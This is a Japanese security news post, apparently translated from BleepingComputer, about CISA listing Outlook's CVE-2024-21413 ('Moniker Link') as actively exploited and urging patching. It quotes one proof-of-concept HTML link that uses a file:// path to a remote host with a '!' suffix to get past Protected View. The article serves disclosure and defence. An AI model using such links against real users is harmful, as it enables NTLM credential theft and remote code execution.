Critical RCE bug in Microsoft Outlook now exploited in attacks
2025/02/06 BleepingComputer — 2025年2月6日 (木) に、米国の CISA は連邦政府機関に対して、Microsoft Outlook の深刻なリモートコード実行 (RCE) 脆弱性を狙う進行中の攻撃から、システムを保護するよう警告を発した。
Check Point の研究者である Haifei Li に発見された、Outlook の脆弱性 CVE-2024-21413 は、悪意のリンクが埋め込まれたメールを開く際の、不適切な入力検証によりトリガーされる。
この脆弱性を悪用する攻撃者は、読取モードで Office ファイルを開くことで、有害コンテンツをブロックする保護ビューを回避して、悪意の Office ファイルを編集モードで開かせ、リモートコードを実行する機会を手にする。
ちょうど1年前に、CVE-2024-21413 にパッチが適用されたときに、Microsoft はプレビュー・ウィンドウが攻撃ベクターであり、悪意を持って作成された Office ドキュメントをプレビューしているときでも、悪用される可能性があると警告していた。
Check Point の説明によると、この Moniker Link と呼ばれるセキュリティ上の欠陥を悪用する脅威アクターは、”file://” プロトコルを用いて悪意のあるリンク埋め込み、さらに、攻撃者が管理するサーバを指す URL に [ ! ] を追加することで、Outlook にビルトインされた保護を回避できるという。
*<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>*
脆弱性 CVE-2024-21413 が影響を及ぼす範囲は、Office LTSC 2021/365 Apps for Enterprise/Outlook 2016/Office 2019 などの、複数の Office 製品にまたがる。それらの製品群に対して CVE-2024-21413 攻撃が成功すると、悪意を持って作成された Office ドキュメントを介して NTLM 資格情報が盗まれ、任意のコード実行にいたる可能性がある。
2025年2月6日 (木) に CISA は、この脆弱性を Known Exploited Vulnerabilities (KEV) カタログに追加し、積極的に悪用されている問題としてマークした。拘束力のある運用指令 (BOD) 22-01 で義務付けられているように、連邦政府機関は 2月27日までの3 週間以内に、この脆弱性に対処し、ネットワークを保護する必要がある。
同機関は、「これらのタイプの脆弱性は、悪意のサイバー攻撃者が頻繁に用いる攻撃ベクターを狙うものであり、連邦政府機関に重大なリスクをもたらす」と警告している。
CISA の主な目的は、連邦政府機関に警告することであるが、民間組織に対しても、この進行中の攻撃をブロックするために、優先的にパッチ適用するようアドバイスしている。
Microsoft Outlook の RCE 脆弱性 CVE-2024-21413 が、CISA KEV に登録されました。この脆弱性は、すでに PoC が提供されていますので、ご利用のチームはご注意ください。なお、関連する直近のトピックは、2024/02/16 の「Microsoft Outlook の脆弱性 CVE-2024-21413:PoC エクスプロイトが GitHub で公開」となります。よろしければ、CVE-2024-21413 で検索と併せて、ご参照ください。
IoT OT Security News 
You must be logged in to post a comment.